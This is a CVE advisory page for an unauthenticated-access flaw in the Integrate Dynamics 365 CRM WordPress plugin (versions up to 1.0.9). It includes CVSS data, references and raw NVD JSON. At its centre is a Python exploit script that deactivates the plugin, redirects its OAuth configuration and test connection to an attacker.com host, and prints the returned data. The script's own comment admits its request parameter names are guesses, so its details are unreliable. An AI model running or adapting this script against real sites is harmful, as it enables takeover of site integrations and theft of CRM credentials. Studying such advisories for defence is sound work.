CVE-2025-10746

Description

The Integrate Dynamics 365 CRM plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.0.9. This is due to missing capability checks and nonce verification on functions hooked to 'init'. This makes it possible for unauthenticated attackers to deactivate the plugin, tamper with OAuth configuration, and trigger test connections that expose sensitive data via direct request to vulnerable endpoints granted they can craft malicious requests with specific parameters.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Integrate Dynamics 365 CRM <= 1.0.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-10746 PoC - Integrate Dynamics 365 CRM Unauthorized Access
# Vulnerability: Missing capability checks and nonce verification on 'init' hooked functions
# Affected: All versions up to and including 1.0.9

import requests

target_url = "http://target-wordpress-site.com"

# Step 1: Deactivate the plugin (unauthenticated)
deactivate_payload = {
    "action": "deactivate_plugin",  # or similar parameter name used by the plugin
    "plugin": "integrate-dynamics-365-crm/integrate-dynamics-365-crm.php"
}
response = requests.post(target_url + "/wp-admin/admin-ajax.php", data=deactivate_payload)
print(f"Plugin deactivation attempt: {response.status_code}")

# Step 2: Tamper with OAuth configuration
oauth_payload = {
    "action": "update_oauth_config",
    "client_id": "attacker_client_id",
    "client_secret": "attacker_secret",
    "redirect_uri": "https://attacker.com/callback"
}
response = requests.post(target_url + "/wp-admin/admin-ajax.php", data=oauth_payload)
print(f"OAuth config tampering attempt: {response.status_code}")

# Step 3: Trigger test connection to expose sensitive data
test_connection_payload = {
    "action": "test_connection",
    "endpoint": "https://attacker.com/capture"  # redirect to attacker-controlled server
}
response = requests.post(target_url + "/wp-admin/admin-ajax.php", data=test_connection_payload)
print(f"Test connection attempt: {response.status_code}")
print(f"Response data: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10746
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10746
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10746/
[4] VulDB https://vuldb.com/cve/CVE-2025-10746
[5] https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/tags/1.0.9/Observer/adminObserver.php#L26
[6] https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/tags/1.0.9/integrate-dynamics-365-crm.php#L48
[7] https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/trunk/Observer/class-adminobserver.php?rev=3370266#L71
[8] https://www.wordfence.com/threat-intel/vulnerabilities/id/b7fb23e8-dabb-4d6e-a2b2-2b27d6a38b3c?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10746", "sourceIdentifier": "[email protected]", "published": "2025-10-04T03:15:35.860", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Integrate Dynamics 365 CRM plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.0.9. This is due to missing capability checks and nonce verification on functions hooked to 'init'. This makes it possible for unauthenticated attackers to deactivate the plugin, tamper with OAuth configuration, and trigger test connections that expose sensitive data via direct request to vulnerable endpoints granted they can craft malicious requests with specific parameters."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/tags/1.0.9/Observer/adminObserver.php#L26", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/tags/1.0.9/integrate-dynamics-365-crm.php#L48", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/trunk/Observer/class-adminobserver.php?rev=3370266#L71", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b7fb23e8-dabb-4d6e-a2b2-2b27d6a38b3c?source=cve", "source": "[email protected]"}]}}